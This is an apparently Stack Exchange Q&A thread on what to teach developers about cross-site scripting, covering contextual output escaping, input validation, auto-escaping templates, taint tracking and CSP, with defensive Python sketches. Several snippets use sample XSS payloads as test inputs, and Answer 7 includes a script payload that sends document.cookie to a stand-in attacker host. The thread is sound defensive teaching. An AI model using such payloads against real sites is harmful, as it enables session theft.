What are some important concepts to teach developers about cross-site scripting (XSS)?

Question

I'm helping with a one-hour training for developers (~100 of them) on cross-site scripting. What are some concepts you think are indispensable to get across to them? Right now we have:

Difference between reflected and stored
Layers of defense (WAFs, browser defenses, server headers, and secure coding)
Secure coding and context of encoding parameters

And most of all, the potential impact of vulnerabilities.

just teach them how to stop it (CSP) instead of pounding nitty gritty vector details. — dandavis, Aug 31 '16 at 20:23
@dandavis it is still very common to have inline js (stackoverflow has it, and even google has it), so when maintaining an existing application, CSP doesn't seem like a reasonable solution. Also, afaik IE still doesn't fully support CSP, and CSP doesn't prevent HTML and CSS injection. At best, it seems like a good defense in depth to me, not a primary solution. — tim, Aug 31 '16 at 20:34
@tim nothing's perfect, but clearly, CSP is the way forward, and one would be remiss to omit it. feel free to diminish the rich user interface of any non-supporting browser (eg block/break js on the page); the user pool is small and shrinking. it's easy to test for vuln inline and redirect to non-js view — dandavis, Aug 31 '16 at 20:46
@dandavis I don't think there is a way to effectively block js on non-supporting browsers. I do think that CSP is a great tool if the application allows using it to full potential (which most currently don't), so it should definitely be mentioned, but it doesn't replace existing solutions (ie HTML encode by default, CSS/JS encode if needed). — tim, Aug 31 '16 at 20:55
@dandavis, secure server-side code should be first line of defense. as for CSP, check this out: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/45542.pdf They say, " In this paper, we take a closer look at the practical benefits of adopting CSP and identify significant flaws in real-world deployments that result in bypasses in 94.72% of all distinct policies. " 94%!!!!! No, I did not read the paper yet. It was just published. — mcgyver5, Sep 02 '16 at 18:25
@mcgyver5: i agree servers should protect you anyway. if CSP is not 100% bad in the link, then it _can_ work. i just read it and 87% of them "failed" because they used 'unsafe-inline', which should not be used without nonces (duh). stay away from jsonp on CDNs, don't forget to block flash, and it works well. good info though, thanks! also a backend takeaway: sanitize user input, including jsonp cb names... — dandavis, Sep 02 '16 at 22:57
I thought the Rails guide had a good section on security. http://guides.rubyonrails.org/security.html — Chloe, Sep 03 '16 at 04:57

score 77 · Answer 1 · answered Aug 31 '16 at 19:22

From a developer's perspective, the first two points you have are not very relevant. Stored and Reflected XSS have the same mitigation: properly escape things you output according to their context. Layers of defense will likely only be viewed as an excuse for poorly implementing this mitigation: "The WAF will catch it for me."

Instead, focus on these code hygiene practices:

Validate, not escape, at input. Input validation should be only for ensuring the input makes sense, not that it is "safe". It's impossible to know at this point whether it is safe, since you don't know all the places it will be used.
Assume all data is unsafe. Never make the assumption that some data has been escaped, or does not include tags or quotes or entities or whatever. Understand that unsafe input can come from anywhere: HTTP headers, cookies, URL parameters, bulk import data, etc.
Escape at point of use. Escape the data for the context in which it is used, when it is used. Only want to escape once to improve performance? Name the destination variable according to where it is safe to use: jsstringsafeEmail, htmlattrsafeColor, htmltextsafeFullName, etc.
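
As a rough illustration of the three rules above, here is a minimal Python sketch. The `validate_username` rule (1 to 30 printable characters) and the `/users?name=` URL are hypothetical and chosen only for the example; the variable names follow the naming idea from the last rule.

```python
import html
from urllib.parse import quote


def validate_username(raw: str) -> str:
    """Hypothetical business rule: 1 to 30 printable characters."""
    # Validation asks "does this make sense?", not "is this safe?".
    if not 1 <= len(raw) <= 30 or not raw.isprintable():
        raise ValueError("username must be 1 to 30 printable characters")
    return raw  # kept exactly as entered, no escaping yet


username = validate_username('<"hotmomma62">')

# Escape at the point of use, once per destination context, and name the
# result after the context in which it is safe to use.
htmltext_username = html.escape(username, quote=True)
urlparam_username = quote(username, safe="")

# The percent-encoded value contains no HTML-special characters, so it can
# sit inside the quoted href attribute as it is.
profile_link = '<a href="/users?name={}">{}</a>'.format(
    urlparam_username, htmltext_username
)
```

The odd-looking username passes validation because the assumed business rule allows it, and it only becomes harmless at the moment it is escaped for a specific destination.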

answered Aug 31 '16 at 19:22

bonsaiviking

+1, the three rules summarize most issues very well. But I would still mention WAF, headers, and browser filters. Otherwise a developer might later find out about them or already know about them, and determine exactly what you fear, but without an explanation why it will not be enough (or even worse, they may try an XSS in Chrome, see that it fails, and decide that the app is safe). Additionally, depending on the application, developers may actually be responsible for setting headers, so they should know that they exist and may provide some additional protection in some situations. – tim Aug 31 '16 at 19:29
**Validate, not escape, at input**, love it! – Matthew Aug 31 '16 at 22:16
First point is overused. I should be able to have username `<"hotmomma62">`, dang it! – Paul Draper Sep 01 '16 at 02:51
@PaulDraper Well, that decision should be made by the business logic of the app, not by the developer's sense of security. That's the difference between validation (does this fit our intended use cases/requirements?) vs escaping (will this break something?) – bonsaiviking Sep 01 '16 at 03:00
@bonsaiviking, it absolutely depends on the tech implementation though. Is this being templated into HTML? JS? SQL? XML? Command line argument? Somewhere else? What encodings? This approach depends on knowing all the places or ways it will be used, which is one of the issues. The robust answer is to escape it at the use site. Anything else is hokey. – Paul Draper Sep 01 '16 at 03:14
Your example variables are a good use of Hungarian notation (congrats), but I'd probably drop the "safe" part, as it only tells us what the previous prefix did. – John Dvorak Sep 03 '16 at 11:34
I'm taking the WAF part out of the presentation since most of these developers don't have a WAF in front of their applications and even if they did, they won't have anything to do with it and shouldn't be expecting it or relying on it. Also, good point about "Validate, not escape at input". But, I still think "defense in depth (i.e. layers) " should be taught because developers miss things. Security headers and regular security scans would be considered defense in depth and can mitigate if they miss something. – mcgyver5 Sep 06 '16 at 13:31

score 19 · Answer 2 · edited Sep 01 '16 at 14:41

What are some concepts you think are indispensable to get across to them?

Difference between Reflected and stored -- I don't really care.
Layers of defense -- Yes. Many developers do not understand "defense in depth". Assume that every other mitigation has failed and your code is the last thing that is standing between the attacker and the vulnerable resource. What can you do to mitigate the attack?
Secure coding and context of encoding parameters -- absolutely.
and most of all, the potential impact of vulnerabilities. -- absolutely

What else? The big thing missing from your list is: there are a great many tools and techniques that can all be used to mitigate these potential vulns; defense in depth suggests that we use as many of them as is feasible.

Be secure by design, secure by default. Think about vulnerabilities at all stages of design and implementation. Make sure that you opt out of being secure when necessary, rather than opt in to being secure when necessary.
Make formal threat models. Where can hostile data enter a system, and where can it leave? Which sub-systems trust each other, and which do not? If you don't know where the boundaries are, it is difficult to harden them against attack.
Strings are the enemy. Data should flow around in smart objects that can be composed intelligently, not strings that can be concatenated and split.
If you are using a language that has a type system, capture whether the data is tainted or untainted in the type system. Make the compiler tell you that you're assigning tainted data into a context that expects untainted data.
If you don't have a compiler finding your bugs for you, emulate a type system in your naming discipline. If a variable contains tainted data, have "tainted" somewhere in its name. If you assign a tainted value to a variable that does not have "tainted" in its name, you've just caught a problem at code review time rather than when the attacker succeeds.
Use static analysis tools designed by security professionals to find these sorts of problems; pay careful attention to the output, even false positives. A false positive is an indication that the code could not be seen to be correct by an analyzer; that means that it also likely cannot be seen to be correct by a human. Fix the code so that the tool does not find the false positive anymore.
Test everything like an attacker, not a user. If there is code that sanitizes input, task a member of your team with attacking it. Sanitizer bugs are a common source of hard-to-spot vulnerabilities.
Make tests for misconfigurations in production. XSS vulns can be caused by accidentally turning off some validation or sanitization for debugging or testing purposes and forgetting to turn it back on, pushing the wrong configuration to production, and so on.
And so on.
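
The idea of capturing taintedness in the type system can be sketched in Python as follows. The `Tainted` and `SafeHtml` wrappers and the `render_comment` function are hypothetical names invented for this example, and a static checker such as mypy is assumed for the compile-time part.

```python
import html
from dataclasses import dataclass


@dataclass(frozen=True)
class Tainted:
    """Raw data from outside the trust boundary (hypothetical wrapper)."""
    raw: str


@dataclass(frozen=True)
class SafeHtml:
    """Text that has already been escaped for an HTML text context."""
    markup: str


def escape_html(value: Tainted) -> SafeHtml:
    # The only sanctioned way to get from Tainted to SafeHtml.
    return SafeHtml(html.escape(value.raw, quote=True))


def render_comment(body: SafeHtml) -> str:
    # A static checker rejects render_comment(Tainted(...)) from the
    # annotations; the isinstance check catches the same mistake at run time.
    if not isinstance(body, SafeHtml):
        raise TypeError("render_comment expects SafeHtml, got " + type(body).__name__)
    return "<p>" + body.markup + "</p>"


tainted_comment = Tainted("<script>alert(1)</script>")
page = render_comment(escape_html(tainted_comment))
```

Passing `tainted_comment` directly to `render_comment` fails, which is the point: the mistake surfaces during type checking or testing instead of in production.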

Great answer. This is incredibly valuable for a developer. Especially love writing automated tests to ensure vulnerabilities are addressed. — scrowler, Sep 01 '16 at 11:35
In respect to the naming discipline, this is what Hungarian notation originally set out to be used for. A relatively famous [article by Joel Spolsky](http://www.joelonsoftware.com/articles/Wrong.html) discusses the exact case of marking strings as being safe or unsafe. I won't make any comment on whether or not Hungarian notation is the right naming system, but it goes to show that effective use of variable names to describe the variables' qualities is always a good thing (within reason). — Pharap, Sep 03 '16 at 06:22

score 9 · Answer 3 · answered Aug 31 '16 at 19:18

You covered most of the basics. To extend a bit on your points (some of these will seem obvious to most readers here, but may not necessarily be obvious to all developers):

XSS can happen via GET and POST.
XSS is also an issue in admin backends.
DOM based XSS exists.
Browser defenses exist, but should not be relied upon. The same goes for WAFs and server headers.
Encoding should happen when printing, not when receiving input.
Context really is important. HTML encoding is not enough in some situations.
JavaScript and CSS escaping/encoding are difficult. Using an existing library is recommended.
All parameters should be encoded. It's not a good approach to only encode parameters that seem unsafe.
Additional input filtering is highly recommended (eg if you need an integer, check that it is actually an integer, ideally localized in some Input class), but should never be the only line of defense.
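
One situation where HTML encoding is not enough is a link target: a `javascript:` URL contains no characters that HTML encoding would change. The sketch below assumes a hypothetical `safe_href` helper and a hypothetical allow-list of schemes; it is one possible approach, not a complete URL sanitizer.

```python
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # hypothetical allow-list


def safe_href(url: str) -> str:
    """Return a value for a quoted href attribute, or "#" if the scheme is not allowed."""
    candidate = url.strip()
    scheme = urlsplit(candidate).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        # Anything that is not explicitly allowed is replaced, including
        # relative URLs in this deliberately strict sketch.
        return "#"
    return html.escape(candidate, quote=True)


# HTML encoding alone leaves the dangerous URL untouched.
encoded_only = html.escape("javascript:alert(1)", quote=True)
```

An allow-list is used rather than a block-list, in line with the advice elsewhere in this thread not to try to outguess the attacker.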

But the most important point in my opinion: HTML Encoding should happen by default, by using a template engine that encodes all parameters by default.

If encoding happens all over the place, it's too easy to forget it just once. It is of course still important to take care of all the situations where HTML encoding is not enough, but most XSS vulnerabilities will be prevented by default encoding.
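
To show what "encodes all parameters by default" means, here is a toy renderer built on the standard library. The `render` function and the `Raw` opt-out marker are hypothetical; in practice an existing template engine with auto-escaping enabled (for example Jinja2 with `autoescape=True`) would play this role.

```python
import html
from string import Template


class Raw(str):
    """Hypothetical opt-out marker for markup that is already safe HTML."""


def render(template: str, **params: object) -> str:
    # Every parameter is HTML-escaped unless it was explicitly wrapped in Raw,
    # so forgetting to escape is no longer possible; only opting out is.
    escaped = {
        name: value if isinstance(value, Raw) else html.escape(str(value), quote=True)
        for name, value in params.items()
    }
    return Template(template).substitute(escaped)


row = render(
    "<li>$name wrote: $comment</li>",
    name="Alice & Bob",
    comment="<img src=x onerror=alert(1)>",
)
```

This only covers the HTML text and quoted-attribute contexts; values placed in scripts, styles, or URLs still need context-specific handling.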

XSS is independent of HTTP method - if a form or query string uses PUT or PATCH etc. (not just GET and POST - basically any data entry) there is potential for XSS vulnerabilities. — Michael, Sep 01 '16 at 08:50

Luis Casillas · Answer 4 · 2016-08-31T19:55:43.107

I think the two most important lessons to teach are these:

If you're generating markup or any other structured textual representation (e.g., JSON, SQL, URL query strings) in an ad-hoc manner by concatenating strings together, then stop what you're doing immediately, and find or build a centralized and safe library for markup or DOM generation.
Don't trust XSS prevention strategies that require you to do any of the following:
- Guess what the attacker will attempt or otherwise try to outsmart the attacker. In particular, input-side filters have a history of being outsmarted by attackers, and should be regarded with suspicion.
- Identify, time and time again in different contexts, which variables are "untrusted" inputs that you must then treat exceptionally. (Rather, all inputs should be untrusted by default—you should have to opt out of XSS protection, not opt in to it.)

On my first point: nearly all injection problems arise from working at the wrong level of abstraction. Programmers concatenate strings in situations where they ought to be using higher-level operations that encapsulate the correct way of doing things. And this means that:

Programmers end up tackling the exact same, tricky problem over and over (correct escaping of string values in the context in which they're inserted). Even if they got it right every single time (not likely!), the solutions would never get reused.
Since the responsibility for correctly escaping the string values is diffused all over the code base instead of being concentrated in one spot, auditing the code for security and fixing the problems becomes a few orders of magnitude harder.
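
As a sketch of working at the higher level of abstraction, the following uses Python standard-library builders for a query string, JSON, and a small piece of markup in place of concatenation. The `/search` path and the sample query are made up for the example, and `xml.etree.ElementTree` emits XML serialization, so treat it as a stand-in for a real HTML or DOM generation library.

```python
import json
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

query = 'cats & dogs"><script>'

# URL query string: urlencode percent-encodes every value.
search_url = "/search?" + urlencode({"q": query, "page": 2})

# JSON: the serializer quotes and escapes the value.
payload = json.dumps({"q": query})

# Markup: build a tree and let the serializer escape text and attributes.
link = ET.Element("a", {"href": search_url, "title": query})
link.text = "Results for " + query
markup = ET.tostring(link, encoding="unicode")
```

None of the three call sites contains any escaping logic of its own, so there is only one place per format to audit.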

On the second point: a good lesson on the dangers of relying on input-side filtering would be to browse through OWASP's XSS Filter Evasion Cheat Sheet. Think of that page as documenting one failed attempt after another and another at solving XSS through input-side filtering, and the cleverness that the attackers were able to use to get around it.

You also often see much advice that talks about "untrusted" inputs and how to process them, which is fraught with dangers because:

Figuring out which inputs can be trusted is a lot of work, particularly when you have to do it over and over;
You might incorrectly judge which inputs are trustworthy;
Inputs that can be trusted today may not be trustworthy tomorrow.

OWASP's XSS Prevention Cheat Sheet is another really excellent document that follows my two points. It focuses on how to safely insert arbitrary strings into dynamically generated HTML, CSS and Javascript documents. If you solve that problem in one place (either in a third-party library or in your codebase) and apply that solution consistently throughout, you'll do very well—you'll have "cut the jugular" of XSS vulnerabilities.

+1 for your first point (the rest of the answer is good too). Just using the right abstraction takes care of a lot of potential security issues, and is just good practice anyway. — Matthew Crumley, Aug 31 '16 at 20:34

score 1 · Answer 5 · answered Aug 31 '16 at 19:30

You've already listed some of the most important concepts - the only thing I would add is the ubiquity and ease of testing for XSS vulns. XSS is often the first vulnerability that is taught, and after SQL injection possibly the most famous. It is also trivial to scan for, and many application scanners like Burp and w3af will be able to detect XSS automatically.

Understanding this is important because it explains why XSS still exists: pretty much all sites have some kind of XSS protection in place, but are still vulnerable when a clever tester or scanner is able to find user input that the developer has forgotten about. To develop XSS-free software, developers have to be conscious of attackers using odd vectors to submit payloads - e.g. HTTP headers, drop-down menus, anything that can be edited in an HTTP proxy.

score 1 · Answer 6 · answered Sep 01 '16 at 14:13

The most important point to make, IMHO, is that you should know what a variable (or database field) contains. You must know whether it's text (and what charset/encoding it is, in that case), or it's HTML (or an HTML attribute, which is yet another type of data), or SQL, etc.

Then, you need to apply the proper conversions when you need to move from one to the other.

The big issue is that in many cases, the representation of a piece of text (probably the most common type of data you can manipulate) is the same whether it's text, HTML, SQL, etc. (the text "abc" is the same as the HTML abc or the SQL 'abc') and for this reason people tend to concatenate bits together without any conversion.

But that will break as soon as you encounter any characters that have a special meaning in one of the contexts. This not only leads to security issues (both XSS and SQL injections), but also to formatting issues (we have all seen sites which start showing HTML entities such as &lt; when they should be displaying <), as people either forget the conversion, or do it multiple times.

It is quite rare that you actually need to allow input of actual HTML. In most cases, you want text. Just keep the text as it is, manipulate it as it is. But once you want to display it (on an HTML page), convert it to HTML (using standard and tested libraries/frameworks, not your improvised regex-based search-and-replace).

Likewise, you convert it when you want to build an SQL request (using parameterised queries, preferably). But you still store it exactly as it is.
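
A small sketch of "store text as text, convert at the boundary", using an in-memory SQLite database. The `comments` table and the sample values are invented for the example.

```python
import html
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE comments (author TEXT, body TEXT)")

author = "O'Brien"
body = "1 < 2 && <b>bold</b>"

# The "?" placeholders carry the values as data, so no SQL escaping is needed
# and the text is stored exactly as it was entered.
conn.execute("INSERT INTO comments (author, body) VALUES (?, ?)", (author, body))

stored_author, stored_body = conn.execute(
    "SELECT author, body FROM comments WHERE author = ?", (author,)
).fetchone()

# Convert text to HTML only at the moment it is displayed.
html_fragment = "<p>{}: {}</p>".format(
    html.escape(stored_author), html.escape(stored_body)
)
```

Because the stored value is still plain text, the same row can later be rendered into JSON, a CSV export, or an email without first undoing an earlier HTML conversion.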

Many frameworks will add abstraction layers that will "hide" all of this if you actually use them. But we all know that even with the best tools, you'll always end up with someone trying to build a bit of HTML themselves, so they need to know what needs to be done if they do so.

If you want/need to manipulate actual HTML, then you enter a completely different dimension in terms of XSS issues. Not sure that can be covered in an hour...

paj28 · Answer 7 · 2016-09-02T07:56:55.193

XSS is serious

Perform a demonstration of XSS to show that it has a real-world impact, beyond alert('xss').

XSS affects us

Provide some statistics, e.g. 17 XSS flaws in our products were identified in penetration tests during the past year.

The solution is escaping

Show them the difference between code that doesn't escape, and is vulnerable, and code that does escape. Attempt the demonstration again and see how it fails.
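
For the side-by-side demonstration, a pair of functions like the following might be enough. The greeting page and the payload are made up for the example, and `attacker.example` is a placeholder host.

```python
import html


def greeting_vulnerable(name: str) -> str:
    # Vulnerable: the value is placed into the markup unchanged.
    return "<h1>Hello, " + name + "</h1>"


def greeting_escaped(name: str) -> str:
    # Fixed: the value is escaped for the HTML text context at output time.
    return "<h1>Hello, " + html.escape(name) + "</h1>"


# A payload that does more than alert(): it sends the cookie to another host.
payload = "<script>new Image().src='//attacker.example/?c='+document.cookie</script>"

unsafe_page = greeting_vulnerable(payload)
safe_page = greeting_escaped(payload)
```

Rendering `unsafe_page` in a browser runs the script, while `safe_page` shows the payload as harmless text.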

Good coding practice

Show them good ways of performing escaping with the languages and frameworks in use in your company. Ideally a template engine that performs automatic escaping. If you have a single language/framework across the company this is easier. Otherwise, show an example, and tell them to read up on the particular framework they are using.

Common pitfalls

Page context. Even if you have an escaping template engine, untrusted data within a <script> tag can cause XSS.

What data is untrusted? e.g. if you fetch an RSS feed from an external site, it is still an XSS risk, even though it's not direct user input.

DOM XSS - using JavaScript eval and document.write can cause XSS.
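
The page-context pitfall can be shown in a few lines: HTML escaping leaves a payload without angle brackets or quotes untouched, which is all an attacker needs inside a `<script>` block. The `script_literal` helper is a hypothetical name, and it assumes the value is meant to become a JavaScript literal in an inline script.

```python
import html
import json


def script_literal(value: object) -> str:
    """Encode a value as a JavaScript literal for use inside an inline <script>."""
    literal = json.dumps(value)
    # Escaping <, > and & keeps "</script>" and "<!--" from ending or
    # confusing the surrounding script block.
    return (
        literal.replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


untrusted = "1; alert(document.domain)"

# HTML escaping changes nothing here, so the injected statement would run.
broken = "<script>var userId = " + html.escape(untrusted) + ";</script>"

# Encoding for the JavaScript context turns the payload into an inert string.
fixed = "<script>var userId = " + script_literal(untrusted) + ";</script>"
```

An auto-escaping template engine typically applies the first kind of escaping, so values inside script blocks need the second kind applied explicitly.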

Defence in depth

CSP is an excellent defence in depth, but may be difficult to implement.

Cookie options and request validation can be easily implemented, but are only partial defences.
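
As a sketch of these defence-in-depth measures, the following builds a nonce-based CSP header and a hardened session cookie with the Python standard library. The `security_headers` function, the policy text, and the cookie name `session` are assumptions for the example; a real policy has to be tailored to the application.

```python
import secrets
from http.cookies import SimpleCookie


def security_headers(session_id: str):
    """Return (headers, nonce) for one response; hypothetical helper."""
    # A fresh nonce per response lets trusted inline scripts run without
    # falling back to 'unsafe-inline'.
    nonce = secrets.token_urlsafe(16)
    csp = (
        "default-src 'self'; "
        "script-src 'self' 'nonce-{}'; "
        "object-src 'none'"
    ).format(nonce)

    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True   # not readable from JavaScript
    cookie["session"]["secure"] = True     # only sent over HTTPS
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"

    headers = [
        ("Content-Security-Policy", csp),
        ("Set-Cookie", cookie["session"].OutputString()),
    ]
    return headers, nonce


headers, nonce = security_headers("abc123")
```

The returned nonce would then be placed on each trusted inline tag, as in `<script nonce="...">`. The `HttpOnly` flag limits what a successful XSS can steal, but it does not stop the injected script from acting as the user.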

Ask for help

When doing something difficult - such as allowing users to use limited HTML tags in comments - ask a security specialist for assistance.
